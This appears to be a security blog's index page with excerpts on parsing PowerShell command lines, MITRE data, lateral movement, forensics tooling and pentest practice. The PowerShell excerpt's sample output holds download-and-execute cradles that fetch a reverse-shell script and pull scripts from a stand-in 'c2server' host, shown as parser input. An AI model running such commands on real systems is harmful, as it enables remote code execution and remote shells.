PowerShell cmdline parsing/tokenization

This is just a quick blog post, mostly as a memo-to-self, to not forget how to parse PowerShell commandlines with C#. Of course as usual, I found a ready made solution when I already had a dirty working version:

The fun part is that, like @FuzzySec often says, it runs on OSX as well :) Some example output:

[Command] powershell
[CommandArgument] iex
[GroupStart] (
[Command] New-Object
[CommandArgument] Net.WebClient
[GroupEnd] )
[Operator] .
[Member] DownloadString
[GroupStart] (
[String] 'http://<yourwebserver>/Invoke-PowerShellTcp.ps1'
[GroupEnd] )
[StatementSeparator] ;
[Command] Invoke-PowerShellTcp
[CommandParameter] -Reverse
[CommandParameter] -IPAddress
[CommandArgument] [IP]
[CommandParameter] -Port
[CommandArgument] [PortNo.]
=============================
[Command] powershell
[CommandParameter] -nop
[CommandParameter] -exec
[CommandArgument] bypass
[CommandParameter] -c
[String] "IEX (New-Object Net.WebClient).DownloadString('http://www.c2server.co.uk/script.ps1');"
=============================
[Command] powershell
[CommandParameter] -exec
[CommandArgument] bypass
[CommandParameter] -c
[String] "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://c2server.co.uk/script.ps1')|iex"
=============================
[Command] powershell.exe
[CommandParameter] -Verb
[CommandArgument] runAs
[CommandParameter] -ArgumentList
[String] "-File C:\Scripts\MyScript.ps1"
=============================
[Command] powershell.exe
[CommandParameter] -File
[String] "C:\Temp\YourScript.ps1"
[CommandParameter] -Noexit
=============================

Analyzing Pipedream / Incontroller with MITRE/STIX

This blog post is intended to further practice with MITRE data as well as understand some OT attack techniques implemented by OT malware. For this we are going to look at Pipedream (researched by Dragos) and Incontroller (researched by Mandiant), no these are not two different malware strains, but the same. It just happened to be a coincidence that they researched the same malware strain and named it differently or so I assume.

I chose OT malware because I was curious, but it could have just been your run of the mill other type of malware. When malware or attacks hits the news a lot of people want to know what it is? who is behind it? what to do against it? wanting to know if they would be resilient against it? and many more questions of a similar sentiment. These questions can be answered in a variety of ways, but I thought, let me answer them by using the MITRE data. You can read about my first baby steps into workin with MITRE data in the previous blog about MITRE, Stix, Pandas, etc.

In this blog post we will dig deeper to actually attempt to answer some of those questions and figure out, if we’d have to deal with this malware, what actions could or should we take to be resilient?

  1. Overview of Pipedream / Incontroller
  2. Our questions
  3. Our answers
    1. What does it do?
    2. Which security controls are relevant?
    3. Do we have logging for its actions?
  4. Conclusion
  5. References

Oh and as usual you can skip to the jupyter notebook here if you prefer a more hands-on approach and less reading.

Continue reading “Analyzing Pipedream / Incontroller with MITRE/STIX”

Lateral movement: A conceptual overview

I’ve often been in the situation of explaining lateral movement to people who do not work in the offensive security field on a daily basis or have a different level of technical understanding. A lof of these times I’ve not really talked about the ways in which lateral movement is performed, but I’ve taken a step back and first talked about the ‘freedom of movement’ that an attacker obtains when they first enter your environment.

This small nuance helps a lot of people to shift their mindset from ‘I’m not an attacker, I don’t know how they move laterally, that sounds technical’ to a more curious thinking ‘How do you mean, freedom? Do you mean what the attacker can do to move around in our environment?’. Depending on their background & knowledge they’ll then be able to name some ways in which they think that an attacker has ‘the freedom to move’. Now don’t get me wrong, I’m not advocating to change the terminology, but helping people to shift their frame of reference goes a long way.

I think it would help a lot of those people to look at lateral movement from a conceptual point of view, instead of trying to understand all the techniques and ways in which lateral movement is achieved. Thus, here you are reading my attempt at explaining lateral movement in a conceptual manner. The goal is to hopefully enable more people to learn about how they can restructure or design their environments to be more resilient against lateral movement.

Simplified view of lateral movement

In the most basic form, the above image is what many people envision when we talk about lateral movement or network propagation. This however, is open to many interpretations, it also feels outdated, since we now have the cloud and the cloud isn’t a network right? Before we jump to conclusions, let’s first generalize lateral movement into the different areas that are always at play when somebody moves inside your environment. This blog post will explain the concepts of:

  • Network
  • Identity
  • Functionality

After which real world examples will be given of the (ab)use of these concepts to achieve lateral movement. The combination of these three concepts allow attackers to move within networks.

  1. The concepts
    1. Network
    2. Identity
    3. Functionality
  2. Real world examples
    1. Remote Desktop
    2. File transfer protocol
    3. Application servers
  3. Conclusion
Continue reading “Lateral movement: A conceptual overview”

Opinion: Time is crucial when building secure components or infrastructures

Like the title implies this time I’m not talking about being able to ‘operate at the speed of an attacker as defenders. I’m talking about, do we sufficiently account for the time factor when we design & build secure components or environments? It seems that when we build we forget about security as soon as we start to run out of time, even if we talk about security by design. Of course this isn’t universally applicable, but I’ve seen this happen at various companies and thought, well let me write it down, maybe it helps to orden my thoughts.

When projects are defined and a time estimate is provided it seems to not include the time required to do this securely, unless we explicitly make security a requirement. As expected security is not made a security requirement for a lot of projects.
The funny aspect is that the time that we (consciously) did not invest at the beginning seems to bite us in the behind later on. Yet, we don’t seem to be bothered by a painful behind or even by missing half of our behind.

Maybe all of this is just human nature? We know that smoking is bad, but since the effects are not immediately visible we are unable to oversee the consequences. Same goes for not doing security from the start, we know the consequences can be bad, but we are unable to oversee how bad exactly.

You might be wondering about specific example to substantiate the above claim. Let’s have a look at some example, that in my opinion are purely a time matter and not so much a resource or money matter. Yes, you could convert all time to resources & money, but in my simple mind, sometimes just allowing for activities to take longer will save you a lot of time & money later on. The interesting aspect is that when I used to be on the offensive side it never crossed my mind to think that one of the causes might be time related, I always assumed that more resources & money would just fix it.

TL;DR: After writing this post I realise that we just can’t seem to find consensus on what the bare minimum security level is that should always be implemented. Which eventually results in people forgetting about security or resulting in security absolutism / perfectionism with the end result of rather not implementing security by default than running the risk of not meeting our (often) self-enforced deadline.

Do read on if you are curious about the examples that lead me to believe that time is crucial if we want to change our behaviour for more secure by default approaches.

Continue reading “Opinion: Time is crucial when building secure components or infrastructures”

OBS: Presentation & slides side by side

This is just a quick blog on how you can quickly stitch together a video file of a presentation and the corresponding talk slides using Open Broadcaster Software (OBS). First time I did this I had to fiddle a little bit around, so this also serves as a mini tutorial for future me. Feel free to leave tips & tricks in the comments.

Continue reading “OBS: Presentation & slides side by side”

Parsing atop files with python dissect.cstruct

Like you’ve probably read, Fox-IT released their incident response framework called dissect, but before that they released the cstruct part of their framework. Ever since they released it publicly I’ve been wanting to find an excuse to play with it on public projects. I witnissed the birth of cstruct back when I was still working at Fox-IT and am very happy to see it all has finally been made public, it sure has evolved since I had a look at the very first version! Special thanks to Erik Schamper (@Schamperr) for answering late night questions about some of the inner workings of dissect.cstruct.

This is one of those things that you can encounter during your incident response assignment and for which life is a bit easier if you can just parse the binary file format with python. Since with incident response you never know in which format exactly you want to receive the data for analysis or what you are looking for it really helps to work with tools that can be rapidly adjusted. python is an ideal environment to achieve this. An added benefit of parsing the structures ourselves with python is that we can avoid string parsing and thus avoid confusion and mistakes.

The atop tool is a performance monitoring tool that can write the output into a binary file format. The creator explains it way better than I do:

Atop is an ASCII full-screen performance monitor for Linux that is capable of reporting the activity of all processes (even if processes have finished during the interval), daily logging of system and process activity for long-term analysis, highlighting overloaded system resources by using colors, etc. At regular intervals, it shows system-level activity related to the CPU, memory, swap, disks (including LVM) and network layers, and for every process (and thread) it shows e.g. the CPU utilization, memory growth, disk utilization, priority, username, state, and exit code.
In combination with the optional kernel module netatop, it even shows network activity per process/thread.

The atop tool website

Like you can imagine, having the above information is of course a nice treasure throve to find during an incident response, even if it is based on a pre-set interval. For the most basic information, you can at least extract process executions with their respective commandlines and the corresponding timestamp.

Since this is an open source tool we can just look at the structure definitions in C and lift them right into cstruct to start parsing. The atop tool itself offers the ability to parse written binary files as well, for example using this commend:

atop -PPRG -r <file>

For the rest of this blog entry we will look at parsing atop binary log files with python and dissect.cstruct. Mostly intended as a walkthrough of the thought process as well.

You can also skip reading the rest of this blog entry and jump to the code if you are impatient or familiar with similar thought processes.

Continue reading “Parsing atop files with python dissect.cstruct”

Baby steps into MITRE Stix/Taxii, Pandas, Graphs & Jupyter notebooks

So there I was preparing a presentation with some pretty pictures and then I thought…after I give this presentation: How will the audience play with the data and see for themselves how these pictures were brought into existence?

Finally I had a nice use-case to play around with some kind of environment to rapidly prototype data visualization in a manner that allows for repeatable further exploration and analyses, hopefully with the ability to draw some kind of conclusion. For now I settled to just learn the basics and get used to all these nifty tools that really make these types of jobs a breeze. You can skip this post and directly go the jupyter notebook if you just want to dive into the data/visualizations. The rest of the blog post is about the choices made and technologies used, mostly intended as a future reference for myself.

MITRE ICS data as a visual graph of techniques (red), mitigations (green), data components (blue)
Continue reading “Baby steps into MITRE Stix/Taxii, Pandas, Graphs & Jupyter notebooks”

Lockbit’s bounty: consequences matter

Apparantly sometimes you only grasp it when it really is in your face, even though you are continuously surrounded by it. The following tweet, made me realize that real consequences to vulnerabilities matter a lot! Oh and this blog is mostly some ponderings and opinions, for the people wondering if they should read it or not :)

Announcement that the first bounty was paid by a ransomware group (Lockbit) for a bug in their encryption implementation

What this tweet made me realize is that for Lockbit the consequence of the bug is directly tied to their income. No indirect damages, no additional bugs, no excuses. If the bug isn’t fixed people don’t need to pay them. How many type of companies and bugs do we know that have the same 1-to-1 relation between the bug and the direct consequence to survival?

This made me wonder if we are approaching the rating & fixing of vulnerabilities within regular companies in a less than optimal manner? Would be interesting if we could learn something from groups that operate on continuous innovation and the severe threat of real life consequences like jail time or worse. In this blog I’ll talk about:

  • Analysing the Lockbit bug bounty
  • Applying the lessons learned to regular companies

TL;DR Bloodhound showed us that graphs are powerful for the analysis and elimination towards domain admin privileges. The same concept should be applied to vulnerablities company wide. Regular companies don’t have the same severe consequences that ransomware groups have, should they?

Continue reading “Lockbit’s bounty: consequences matter”

Generating network connection information for experimentation purposes

In one of my last blogs I talked about visualizing firewall data for the purpose of analyzing the configuration and potentially identify security issues. As usual you can skip directly to the tool on my github, or keep on reading.

I wanted to continue playing with this approach to see how it could be improved from a fairly static tool, to a more graph database like approach. However, it turns out that it is somewhat difficult to obtain public firewall configuration files to play with. This is a similar problem to people doing machine learning in cybersecurity where obtaining datasets is still a bit of a challenge.

I decided to write a tool to generate this connection information and at the same time play as well as learn some things which I usually never bother with during development of proof-of-concept projects. So this time I decided to actually document my code, use type annotation and type hints as well as write some unit tests using pytest and actually figure out how argparse sub-commands work.

The tool intends to eventually offer the following options, but for now it only offers the plain option:

python generator_cli.py
usage: generator_cli.py [-h] [--debug] [--verbose] [--config CONFIG] [--mode {inner,outer,all}] {plain,time,apps,full} ...

Generate network connection with a varying level of metadata

options:
  -h, --help            show this help message and exit
  --debug               set debug level
  --verbose             set informational level
  --config CONFIG       Configuration file
  --mode {inner,outer,all}
                        Generate only inner vlan, outer vlan or all connections

Available sub-commands:
  {plain,time,apps,full}
                        Generate connection dataset with different levels of metadata
    plain               Only ip,src,ports
    time                Adds timestamp within desired range
    apps                Adds application details per connection
    full                Generates connections with timestamps & application information

Thanks for giving this a try! --DiabloHorn

The plain option generates the bare minimum of connection information:

{'srchost': '219.64.120.76', 'dsthost': '68.206.89.177', 'srcport': 64878, 'dstport': 3389}
{'srchost': '219.64.120.13', 'dsthost': '68.206.89.162', 'srcport': 63219, 'dstport': 3389}
{'srchost': '92.9.15.58', 'dsthost': '118.220.234.59', 'srcport': 49842, 'dstport': 3389}
{'srchost': '92.9.15.62', 'dsthost': '118.220.234.216', 'srcport': 57969, 'dstport': 445}

The main concept of the tool is that you can define VLAN names and some options and based on that information inner and outer connections for those VLANs are then generated. The --mode parameter controls which type of connections it will generate. The inner mode will only generate connections within the VLAN, the outer mode will generate only connections from the VLAN to other VLANs and the all mode will generate both.

I hope, but don’t promise, to eventually implement the other subcommands time for the generation of connection info within a defined time range (each connection being timestamped) and apps to generate connection info linked to applications like chrome, spotify, etc.

The following set of commands illustrate how you can use this tool to generate pretty pictures with yED

python generator_cli.py plain | jq '[.srchost,.dsthost,.dstport] | join(",")'

Which will output something along the lines of this, which after converting to an Excel document you can import with yED:

139.75.237.238,127.17.254.69,389
139.75.237.123,127.17.254.147,389
139.75.237.243,127.17.254.192,80
139.75.237.100,127.17.254.149,389

The featured image of this blogs shows all of the generated nodes, the following image provides details of one of those generated collection of nodes:

Details of a single collection of generated nodes

Three ways to hack an ATM

Please note: This is a mirrored post from a blog I wrote for one of my employers. The goal is to avoid the content being lost, since corporate websites are restructured and changed frequently.

Keyboard attacks, disk attacks and network attacks

Hacking ATMs, also known as Jackpotting, is an activity that speaks to our imagination, conjuring up visions of ATMs that spit out money into the street for everyone to pick up. The three attacks that we describe in this article are the result and recurring theme of numerous assessments that we have performed over the years for many of our customers. These are the (digital) attacks that we believe matter most and that require a serious look from anyone protecting an ATM.

Please note that hacking of ATM’s is an illegal action. Fox-IT’s security experts have performed these attacks with the permission of the ATM’s owners.

Continue reading “Three ways to hack an ATM”

Writing a zero findings pentest report

Recently I came across a tweet by @CristiVlad25 asking about what you should write in a pentest report, when there are no findings? I did a quick quote tweet with the first thoughts that came to mind:

Which got me thinking, why not write a bit more about this situation? There are multiple resources on writing pentest reports that all highlight different aspects of the general structure and approach of a pentest report, so I won’t get into that, you can find multiple references, including sample reports at the end of this blog post.

Instead I want to only focus on the situation that you have 0, zero, nothing, nil findings. What do you do then?

Continue reading “Writing a zero findings pentest report”

Firewall analysis: A portable graph based approach

Sometimes you are asked to perform a firewall analysis to determine if the configuration can be improved upon to reduce the ability for an attacker to move laterally through the network or identify attack paths that have been missed due to the many firewall changes.

You can perform this analysis using many tools and approaches, ranging from manually reviewing every rule, to using an automated tool like nipper or my personal favourite using a graph based approach (also works for log data). The reference section of this post contains papers that go in-depth on this approach.

With the graph based approach you can visualize the ruleset to identify nodes that have a lot of incoming and/or outgoing connections, but you can also trace paths through the network to understand if they should be removed. When combined with bloodhound data and neo4j you can query the data and have the graph database answer questions like “Is there a path from the workstation to the finance server?”. This requires some fair amount of knowledge, as well as supporting software to get it all setup, which in turn complicates the transfer of knowledge to network engineer or firewall administrators to be able to perform these analysis themselves, for the sake of better understanding if their changes impacted the security of the network.

Bottom line for me with these type of analysis is: How can I transfer security knowledge in an easy and understandable manner, to the people that have to deal with maintaining the environment on a daily basis?

Continue reading “Firewall analysis: A portable graph based approach”

More doing, less cyber

A nice and rainy sunday evening, at least from the perspective of the couch that I was on about 10 minutes ago. I have now gotten up and walked to my laptop to rant, rant about cyber and rant about the many excuses that companies use to not become more resilient against attacks. Funnily enough, those excuses have now become the excuses of the cyber people as well. This post won’t really solve anything, it will however allow me to refill my glass of wine and bring me a warm fuzzy feeling of having shared my opinion online, without any goal or intended audience.

If you just want to have a drink (non-alcohol included) and read some chaotic ranting, do continue. Hope you get at the very least a laugh out of it, since your pool of tears has probably dried up a long time ago if you work in cyber security. Oh and if you strongly disagree with this post or it gets you angry or frustrated, just remember that I wrote this to relax, enjoy some wine, rant and then on monday start all over again with attempting to make the reality in which I operate just a little bit more resilient, if possible.

Continue reading “More doing, less cyber”

CSAW 2021, binary ninja & a haystack

Getting to know the cloud version of Binary Ninja by reversing the CSAW 2021 haystack challenge.

This is a quick post on our adventures with binary ninja and the haySTACK challenge from this year’s CSAW 2021. On a lost evening @donnymaasland & @nebukatnetsar were playing around and said: Well this looks fun, let’s try it out with Binary Ninja.

I had totally forgotten about Binary Ninja, but boy oh boy do I still like it! Not that I forgot because I use other tools, mostly I forgot because I hardly do technical stuff nowadays. If you are not familiar with it, it is a reversing tool / framework which has a rich API if you use the native client.

The binja cloud version

The nice part is that it also include what they call “High Level IL” which basically is a decompiler that shows you ASM converted to pretty readable C like representation. The even more awesome part is that collaborating on the same binary is a breeze. You can work with multiple people in the same binary without needing to setup anything yourself, just need to make sure everyone has an account on https://cloud.binary.ninja

Let’s get started with the challenge, or more specific getting to know the cloud version of Binary Ninja by playing around with this challenge. We’ll cover some things like:

  • Renaming variables
  • Creating & applying enums
  • Creating & applying structs
  • Inviting others to collaborate
  • Understanding the thought process
Continue reading “CSAW 2021, binary ninja & a haystack”

Pentesting: What I should have done

If had the luxury of talking to my past self, these are things I whished I would have done differently during the years that I performed pentesting. Some of these I eventually learned before I finished pentesting, others well, let’s just say they are much more recent. If I think of more items I’ll attempt to update the blog.

If you are a pentester and you are reading this, I hope you can benefit from them. Just make sure you evaluate if they are applicable to your situation and adjust them as required. If you are in a rush, here is the list, details can be found in the rest of this article:

  • Don’t be afraid of talking to clients
  • Always ask for equivalent access
  • Avoid blackbox tests
  • Write the report while you pentest
  • Images, images & images
  • Provide detection advice & POCs
  • Provide reproducible POCs for your attacks (security regression tests)
  • Provide scripts to fix the issue (when possible)
  • Publish more
  • Grasp the bigger picture
  • Include what you didn’t do
  • Don’t be afraid to say something was good

I’ve also included some crazy fantasies of mine, which I’ll always be wondering if they would’ve made a difference.

  • Re-use reports and label them as such
  • Provide the report upfront
Continue reading “Pentesting: What I should have done”